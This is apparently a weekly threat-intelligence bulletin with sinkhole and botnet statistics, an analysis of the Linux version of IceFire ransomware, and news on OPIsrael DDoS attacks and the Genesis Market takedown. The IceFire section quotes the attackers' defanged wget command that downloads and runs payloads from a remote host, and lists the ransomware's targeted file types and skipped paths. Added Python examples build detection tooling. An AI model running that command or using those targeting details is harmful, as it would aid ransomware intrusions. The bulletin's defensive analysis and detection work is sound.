Activity Summary - Week Ending on 6 April 2023:

  • Red Sky Alliance identified 27,743 connections from new IPs checking in with our Sinkholes
  • Contabo GmbH in Germany hit 58x
  • 10 ‘new’ Botnets hits
  • 202,557 ‘new’ Sinkhole hits
  • IceFire Ransomware  
  • OPIsrael
  • Genesis Market Takedown
  • South African Woes

Red Sky Alliance Compromised (C2) IPs

IP                Contacts
185.215.180.76    73
176.111.173.153   53
89.248.165.204    51
5.188.86.230      43
20.241.40.18      36

185.215.180.76 was reported 58 times; confidence of abuse 79%. ISP: Contabo GmbH; Usage Type: Data Center/Web Hosting/Transit; Hostname(s): vmi1145721.contaboserver.net; Domain Name: contabo.com; Country: Germany; City: Munich, Bayern.
https://www.abuseipdb.com/check/185.215.180.76

 

Red Sky Alliance Malware Activity

On 5 April 2023, Red Sky Alliance identified 27,743 connections from new unique IP addresses checking in with one of the many Red Sky Alliance sinkholed domains.

Malware Variant   Times Seen
sality            24,294
corkow            1,874
sykipot           385
betabot           293
shiz              285

Top 5 malware variants by number of contacts. Sality and Corkow have consistently remained the top variants; Sykipot follows.

 

 

For a full blacklist, contact analysts: info@redskyalliance.com

Red Sky Alliance Botnet Tracker

On 5 April 2023, analysts identified 10 new IP addresses participating in various botnets (call for the full .csv blacklists; below is only a small sample of the botnet trackers). We are currently upgrading this collection.

First Seen            Botnet Attribution          Infected Host's IPv4 Address
2023-04-03T13:08:11   SOCKS4 proxy | port 8888    23.236.65.229
2023-03-30T16:08:06   SOCKS4 proxy | port 1081    43.155.81.198
2023-04-03T13:08:06   HTTP proxy | port 83        43.249.224.172
2023-04-03T13:08:13   HTTP proxy | port 83        43.249.224.174
2023-04-03T13:08:21   SOCKS4 proxy | port 34432   43.250.81.155

 

Red Sky Alliance Sinkhole Traffic / Last 30 days

Sinkhole Traffic – Red Sky Alliance runs a proprietary sinkhole and collects indicators from known former malicious domains. This data is proprietary and not available from any other source.

[Chart: Red Sky Alliance sinkhole traffic, last 30 days]

MALICIOUS CYBER TRENDS:

IceFire - SentinelLabs recently observed a novel Linux version of the IceFire ransomware being deployed in mid-February 2023 against enterprise networks. The .iFire file extension is associated with known reports of IceFire, a ransomware family noted by MalwareHunterTeam in March 2022.

Before this report, IceFire had shown only a Windows-centric focus. The attackers' tactics are consistent with those of the 'big-game hunting' (BGH) ransomware families: double extortion, targeting large enterprises, using numerous persistence mechanisms, and evading analysis by deleting log files. Previous reports indicate that IceFire targeted technology companies; SentinelLabs observed these recent attacks against organizations in the media and entertainment sector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, countries that are typically not a focus for organized ransomware actors.[1]

Technical Analysis - The IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary compiled with gcc for the AMD64 architecture. Analysts tested the sample on Intel-based Ubuntu and Debian systems; IceFire ran successfully on both. In observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of the IBM Aspera Faspex file-server software. The attackers downloaded two payloads with wget and saved them to /opt/aspera/faspex:

sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo

On execution, files are encrypted and renamed with the “.ifire” extension appended to the file name. IceFire then deletes itself by removing its own binary, as the screenshots below show.


[Image: Files on the user desktop of a Debian system before and after running IceFire]

The “.iFire” extension is appended to the file name. IceFire skipped the files with “.sh” and “.cfg” extensions.


[Image: A file with the .cpp extension that was encrypted by IceFire]

Excluded Files & Folders - The sample contains data-segment references to a list of file extensions. These extensions are excluded from encryption because they belong to executables or to application or system functionality. In the case of .txt and .pid, encrypting these files could impede the ransomware's own operation.

.cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb

The following file extensions are targeted for encryption:

.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

IceFire does not encrypt every file on a Linux host: it skips a set of system paths so that critical parts of the system remain operational. In one observed infection the /srv directory was nevertheless encrypted, so these exclusions can be selectively overridden.

Folder   Description
/boot    Data used at startup
/dev     Device files, drivers
/etc     System configuration files
/lib     Shared libraries used by applications or the system for dynamically linked functionality
/proc    Virtual filesystem used by Linux to expose runtime system information such as PIDs, mounted drives and system configuration
/srv     Web server directories
/sys     Interface to the kernel; similar to /proc
/usr     User-level binaries and static data
/var     Dynamic data, e.g. caches, databases
/run     System information, including PID files; cleared on each reboot

 

During SentinelLabs' analysis, the user profile directory at /home/[user_name]/ saw the most encryption activity. IceFire targets user and shared directories (e.g., /mnt, /media, /share) for encryption; these are unprotected parts of the file system that do not require elevated privileges to write to or modify.

Interestingly, several file-sharing clients were still able to download files (by then encrypted) after IceFire had encrypted the file server's shared folders: the service itself kept running despite the attack. This implies that the IceFire developer made deliberate choices about the excluded paths and file extensions.

IceFire Linux Payload Delivery & Infrastructure - IceFire for Windows is delivered through phishing messages and by pivoting with post-exploitation frameworks. The Linux variant is in its infancy, though SentinelLabs' observations indicate it was deployed using an exploit for CVE-2022-47986, a recently patched vulnerability in IBM's Aspera Faspex file-sharing software.

IceFire payloads are hosted on a DigitalOcean droplet at 159.65.217.216 with the following URL format:

  • hxxp[://]159.65.217.216:8080/(subdomain.domain.TLD|IP_Address)/iFire

The following regular expression can be used to detect IceFire payload URLs. Consider wildcarding the DigitalOcean IP address in case the actors pivot to a new delivery IP or domain. (The pattern as published by SentinelLabs carries a "^" anchor inside the IP-address alternative; because "^" matches only at the start of the input, that branch could never match after the URL prefix, so it is omitted here.)

  • http:\/\/159\.65\.217\.216:8080\/(([a-z]+\.){2}([a-z]+)|((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})\/iFire
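As an added worked example (not code from the original page or from SentinelLabs), the Python below compiles the detection pattern above, with the stray "^" dropped, and runs it over a handful of constructed log lines, one of which mirrors the wget command shown earlier. It also shows the wildcarded variant the text recommends, which flags the /demo stager and the /<victim>/iFire path on port 8080 regardless of delivery host. The log lines and the names 203.0.113.10, files.example.com, backup.example.net and intranet.example.com are all made up for the example.

```python
import re

# Pattern from the SentinelLabs write-up with the inner "^" anchor removed from the
# IP-address alternative, so a dotted-quad victim identifier can match after the prefix.
ICEFIRE_URL_RE = re.compile(
    r"http://159\.65\.217\.216:8080/"
    r"(([a-z]+\.){2}([a-z]+)|((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})"
    r"/iFire"
)

# Hunting variant: the page suggests wildcarding the DigitalOcean address in case the
# actors pivot. Any host on port 8080 serving "/demo" or "/<victim>/iFire" is flagged.
ICEFIRE_ANYHOST_RE = re.compile(
    r"https?://(?P<host>[\w.-]+):8080/(?:(?P<victim>[^/\s]+)/iFire|demo)\b"
)


def find_icefire_urls(lines, strict=True):
    """Return (line_number, url) for every IceFire payload URL found in the given lines.

    strict=True uses the published pattern (fixed delivery IP, three-label lowercase
    hostname or dotted-quad victim identifier, /iFire only); strict=False uses the
    wildcarded hunting pattern.
    """
    pattern = ICEFIRE_URL_RE if strict else ICEFIRE_ANYHOST_RE
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in pattern.finditer(line):
            hits.append((number, match.group(0)))
    return hits


# Constructed sample input (not real telemetry): an auditd-style EXECVE record that
# mirrors the observed wget command, two proxy-log lines, and benign port-8080 traffic.
SAMPLE_LINES = [
    'type=EXECVE a0="sh" a1="-c" a2="rm -f demo iFire && '
    'wget http://159.65.217.216:8080/demo && '
    'wget http://159.65.217.216:8080/files.example.com/iFire && chmod +x demo && ./demo"',
    "2023-04-03T13:08:11Z 10.0.0.5 GET http://159.65.217.216:8080/10.0.0.5/iFire 200",
    "2023-04-03T13:09:00Z 10.0.0.6 GET http://203.0.113.10:8080/backup.example.net/iFire 200",
    "2023-04-03T13:10:00Z 10.0.0.7 GET http://intranet.example.com:8080/status 200",
]


if __name__ == "__main__":
    for label, strict in (("strict", True), ("wildcarded", False)):
        print(f"--- {label} pattern ---")
        for number, url in find_icefire_urls(SAMPLE_LINES, strict=strict):
            print(f"line {number}: {url}")
```

The strict pattern deliberately misses the /demo stager and any victim hostname that is not exactly three lowercase labels (names containing digits, hyphens or a fourth label slip through). The wildcarded pattern catches a pivot to a new delivery host (line 3 of the sample) at the cost of more false positives on unrelated port-8080 services, so treat its hits as leads to triage rather than verdicts.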

Open-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:

  • Other payload URLs with “aspera” in the secondary hostname section of the URI
  • Session cookie name: _aspera_faspex_session
  • Service fingerprinting indexed a vulnerable version of Aspera Faspex software

Notable Findings - As of this writing, the IceFire binary was detected by 0/61 VirusTotal engines.  Notably, this sample contains many statically linked functions from the legitimate OpenSSL library, contributing to the relatively large file size.  The binary contains the following hardcoded RSA public key:

-----BEGIN RSA PUBLIC KEY-----
MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+
ZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w
FadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP
c0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE
j6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK
dvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB
-----END RSA PUBLIC KEY-----
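As an added example (not the page's or SentinelLabs' code), the pure-Python snippet below decodes the hardcoded key above and parses its PKCS#1 RSAPublicKey structure (a SEQUENCE of two INTEGERs, RFC 8017 A.1.1) without third-party libraries, so an analyst can pull the modulus size, the public exponent and a SHA-256 fingerprint of the DER bytes. Using that fingerprint to cluster samples is this example's suggestion, not something the page states.

```python
import base64
import hashlib

# The PKCS#1 RSA public key embedded in the IceFire Linux sample, as printed on this page.
ICEFIRE_PUBKEY_PEM = """-----BEGIN RSA PUBLIC KEY-----
MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+
ZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w
FadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP
c0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE
j6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK
dvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB
-----END RSA PUBLIC KEY-----"""


def pem_to_der(pem: str) -> bytes:
    """Strip the PEM armour lines and base64-decode the body into DER bytes."""
    body = "".join(
        line.strip() for line in pem.splitlines()
        if line.strip() and not line.strip().startswith("-----")
    )
    return base64.b64decode(body, validate=True)


def _read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value at pos. Returns (tag, value, position after it).

    Handles short-form lengths (< 128) and long-form lengths (0x8n followed by n bytes).
    """
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n_len_bytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n_len_bytes], "big")
        pos += n_len_bytes
    return tag, buf[pos:pos + length], pos + length


def parse_pkcs1_rsa_public_key(der: bytes):
    """Parse RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    tag, seq, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("expected a single DER SEQUENCE spanning the whole key")
    tag_n, n_bytes, pos = _read_tlv(seq, 0)
    tag_e, e_bytes, pos = _read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02 or pos != len(seq):
        raise ValueError("expected exactly two INTEGERs inside the SEQUENCE")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def describe_key(pem: str) -> dict:
    """Summarise a PKCS#1 public key: DER size, modulus bits, exponent, SHA-256 of the DER."""
    der = pem_to_der(pem)
    n, e = parse_pkcs1_rsa_public_key(der)
    return {
        "der_length": len(der),
        "modulus_bits": n.bit_length(),
        "public_exponent": e,
        "sha256": hashlib.sha256(der).hexdigest(),
    }


if __name__ == "__main__":
    for key, value in describe_key(ICEFIRE_PUBKEY_PEM).items():
        print(f"{key}: {value}")
```

If the operator hardcodes the same key into other builds, the DER fingerprint is a cheap way to cluster samples; a different key in a new sample points to a rebuilt or re-keyed variant. The parser deliberately rejects anything that is not exactly one SEQUENCE of two INTEGERs, so a SubjectPublicKeyInfo ("BEGIN PUBLIC KEY") blob is refused rather than misread.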

In a cryptographic logging function, the binary contains an embedded path referencing the Desktop of a user named “Jhone.” The .cnf extension potentially refers to a configuration file. The relic sits near the end of the OpenSSL functionality; it is possible that the OpenSSL package contained this artifact and that it does not originate from the ransomware developer.

[Image: Function for writing a log file to user Jhone's Desktop]

Ransom Notes

IceFire drops the ransom note from an embedded resource in the binary and writes it to each directory targeted for file encryption. The ransom note contains a hardcoded username and password that are required to log into the ransom payment portal hosted on a Tor hidden service at 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion.

[Image: Linux version of the IceFire ransom note]

The Linux version’s Onion hostname matches the hostname that ransomware trackers tie to IceFire, including attacks targeting Windows.


[Image: IceFire ransom login page]

[Image: IceFire victim leaks page]

Conclusion - This evolution of IceFire confirms that ransomware targeting Linux continues to grow in popularity through 2023. While the groundwork was laid in 2021, the Linux ransomware trend accelerated in 2022 when prominent groups added Linux encryptors to their arsenals, including BlackBasta, Hive, Qilin, Vice Society aka HelloKitty, and others. Compared with Windows, Linux is harder to deploy ransomware against, particularly at scale. Many Linux systems are servers, so typical infection vectors such as phishing or drive-by downloads are less effective. To overcome this, actors turn to exploiting application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through the IBM Aspera Faspex vulnerability.

Indicators of Compromise

SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973

Payload URLs: hxxp[://]159.65.217.216:8080/demo and hxxp[://]159.65.217.216:8080/{victim hostname or IP}/iFire

Payload host: 159.65.217.216 (DigitalOcean droplet)

Ransom portal: 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion

Encrypted file extension: .iFire

 

GLOBAL TRENDS:   

OPIsrael - The website of Check Point, one of Israel's largest cyber-security companies, was knocked offline on the afternoon of 4 April by a group of hackers calling themselves "Anonymous Sudan". After a short while the site appeared to return to normal operation. Earlier in the day, the websites of several major Israeli universities were attacked by the same group and were down for several hours. Among the sites unavailable for browsing were those of Tel Aviv University, the Hebrew University of Jerusalem, Ben-Gurion University of the Negev, Haifa University, the Weizmann Institute of Science, the Open University of Israel and Reichman University.

Statement from the Check Point spokesperson:  "All our sites are functioning well despite a large-scale attack on them," Check Point's spokesperson said in a statement.  "The company's website is protected against DDoS (Distributed Denial of Service) attacks at the highest level. [It is] one of the strongest websites in the world.  The hackers used a huge amount of requests [in order to] affect - for a few minutes, the ability to reach the site. Thanks to [our] protections, the site works as usual and was not damaged by the attack."

The hacker group's statement: The hacker group published a statement on its Telegram account, listing the sites it attacked.  "Infrastructure: Universities - Israel education sector has been dropped Because [sic] of what they did in Palestine," the statement read.  The group also added that this wasn't its main attack, which will occur on April 7. It is not clear if the attack also penetrated into the institutions' systems.

This attack is part of a campaign called OPIsrael, in which activists try to attack targets on the Israeli internet, according to Ynet News.  Some of the sites attacked earlier this week are now available again.  "These are service-preventing attacks, those that only bring down websites and do not steal information and that can be recovered from relatively easily.  However, it can be assumed that these groups are trying to produce more significant attacks, including ransom attacks and data theft," cyber security firm Check Point said. According to Check Point, the Anonymous group also shortly attacked websites related to several medical centers, including Rambam Hospital in Haifa. However, the hospital denied the attack.[2]

US, Genesis Market Takedown - The FBI and Department of Justice said on Wednesday that investigators were able to take down the cybercrime platform Genesis Market after identifying and locating its backend servers. Globally, almost 120 people had been arrested within 24 hours of Tuesday's takedown of one of the world's largest facilitators of online fraud.[3]

The login pages of all three of Genesis Market's clear-web domains were replaced on 4 April by a splash page informing users that the domain was now in the control of the FBI. These three domains were included on the US Treasury's sanctions list, which identified Genesis Market as being based in Russia, alongside a dark-web .onion site that the criminal platform also used.

The law enforcement action was described as “an unprecedented takedown of a major criminal marketplace that enabled cybercriminals to victimize individuals, businesses, and governments around the world,” by the US Attorney General.  Officials said the investigation was ongoing.

Genesis Market functioned as a one-stop shop for criminals, selling both stolen credentials and the tools to weaponize that data. Law enforcement officials believe its administrators made more than $8.7 million since founding the site in 2018. It was unique in providing a web browser into which criminals could import stolen victim profiles (IP addresses, session cookies, operating system information and browser plugins) so they could impersonate those victims.

South Africa - Forty percent (40%) of South African companies struggle to hire and retain cyber security talent, and 64% agree that the shortage of cyber security skills creates additional cyber risks for organizations.  This is according to cyber security firm Fortinet’s 2023 Global Cybersecurity Skills Gap report, which found that in the past 12 months, 39% of South African organizations suffered breaches that cost over US $1 million to remediate.[4]

In addition, 86% indicated they had experienced more than one cyber-attack that could be partially attributed to a lack of cyber-security skills on their teams. Fortinet says many short-staffed cyber-security teams are burdened and strained as they try to keep up with thousands of daily threat alerts and to manage disparate solutions to protect their organization's devices and data. Fortinet adds that a cyber-security workforce gap jeopardizes the most foundational functions of the profession, such as risk assessment, oversight and critical-systems patching.

The Cybersecurity Workforce Study released by (ISC)², a global information-security non-profit, found that 70% of respondents feel their organization does not have enough cyber-security staff to be effective. The study estimates that 3.4 million professionals are needed to fill the worldwide cyber-security workforce gap, of which the EMEA region alone requires 317,050.

Tech certification – The Fortinet research shows that 94% of South African companies prefer to hire talent with a technology-focused certification, but 78% indicated they are struggling to find people with this certification.  “94% are willing to pay for employees to acquire certification,” it adds.  One way to reduce this gap is to establish more authorized training centers and academic partner programs in high schools, colleges and universities.  Organizations are also looking to tap into new talent pools, with 8 out of 10 respondents having diversity goals as part of their hiring practices.

The EVP of products and CMO at Fortinet, says, “The cyber security talent shortage is one of the top challenges putting organizations at risk…  In today’s climate, organizations must choose products that introduce automation to offload overworked teams while continuing to focus on upskilling and cyber security training.” 

[1] https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/

[2] https://www.jpost.com/breaking-news/article-736351

[3] https://krebsonsecurity.com/2023/04/fbi-seizes-bot-shop-genesis-market-amid-arrests-targeting-operators-suppliers/

[4] https://www.msn.com/en-za/news/other/south-africa-under-pressure-to-fill-cyber-security-skills-gap/ar-AA19xD10
